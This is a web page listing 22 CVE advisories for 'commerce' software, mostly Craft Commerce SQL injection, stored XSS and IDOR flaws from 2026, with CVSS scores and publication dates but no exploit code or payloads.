Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

commerce — Vulnerabilities & Security Advisories 22

All 22 CVE vulnerabilities found in commerce, with AI-generated Chinese analysis, references, and POCs.

Vendor: n/a

CVE IDTitleCVSSSeverityPublished
CVE-2026-32272 Craft Commerce: Blind SQL Injection via hasVariant/hasProduct CWE-89 9.8 -2026-04-13
CVE-2026-32271 Craft Commerce: SQL Injection can lead to Remote Code Execution via TotalRevenue Widget CWE-89 8.8 -2026-04-13
CVE-2026-32270 Craft Commerce: Unauthenticated information disclosure in `commerce/payments/pay` can leak some customer order data on anonymous payments CWE-200 5.3 -2026-04-13
CVE-2026-31867 Craft Commerce has a Potential IDOR in Commerce carts CWE-639 8.1AIHighAI2026-03-11
CVE-2026-29177 Craft Commerce has Stored XSS in Craft Commerce Order Details Slideout CWE-79 5.4AIMediumAI2026-03-10
CVE-2026-29176 Craft Commerce has Stored XSS in Inventory Location Name CWE-79 4.8AIMediumAI2026-03-10
CVE-2026-29175 Multiple Stored XSS in Commerce Inventory Page Leading to Session Hijacking CWE-79 6.1AIMediumAI2026-03-10
CVE-2026-29174 Craft Commerce has a SQL Injection in Commerce Inventory Table Sorting CWE-89 8.8AIHighAI2026-03-10
CVE-2026-29173 Craft Commerce has Stored XSS while updating Order Status from Orders Table CWE-79 5.4AIMediumAI2026-03-10
CVE-2026-29172 Craft Commerce has a SQL Injection in Commerce Purchasables Table Sorting CWE-89 8.8AIHighAI2026-03-10
CVE-2026-25522 Craft Commerce has Stored XSS in Shipping Zone (Name & Description) Fields Leading to Potential Privilege Escalation CWE-79 4.8AIMediumAI2026-02-03
CVE-2026-25490 Craft Commerce has Stored XSS in Inventory Location Address Leading to Potential Privilege Escalation CWE-79 4.8AIMediumAI2026-02-03
CVE-2026-25489 Craft Commerce has Stored XSS in Tax Zones (Name & Description) Leading to Potential Privilege Escalation CWE-79 5.4AIMediumAI2026-02-03
CVE-2026-25488 Craft Commerce has Stored XSS in Tax Categories (Name & Description) Fields Leading to Potential Privilege Escalation CWE-79 4.8AIMediumAI2026-02-03
CVE-2026-25487 Craft CMS has Stored XSS in Tax Rates Name Leading to Potential Privilege Escalation CWE-79 4.8AIMediumAI2026-02-03
CVE-2026-25486 Craft Commerce has Stored XSS in Shipping Methods Name Field Leading to Potential Privilege Escalation CWE-79 4.8AIMediumAI2026-02-03
CVE-2026-25485 Craft Commerce has Stored XSS in Shipping Categories (Name & Description) Fields Leading to Potential Privilege Escalation CWE-79 4.8AIMediumAI2026-02-03
CVE-2026-25484 Craft Commerce has Stored XSS in Product Type Name CWE-79 5.4AIMediumAI2026-02-03
CVE-2026-25483 Craft Commerce has Stored XSS via Order Status Message with potential database exfiltration CWE-79 5.4AIMediumAI2026-02-03
CVE-2026-25482 Craft Commerce has Stored DOM XSS in Order Status Name (Reflects in "Recent Orders" Dashboard Widget) CWE-79 5.4AIMediumAI2026-02-03
CVE-2024-23576 HCL Commerce is potentially affected by a denial of service and information disclosure vulnerability 7.1 High2024-05-13
CVE-2021-27741 HCL Commerce 代码问题漏洞 9.1 -2021-08-13

All 22 known CVE vulnerabilities affecting commerce with full Chinese analysis, references, and POCs where available.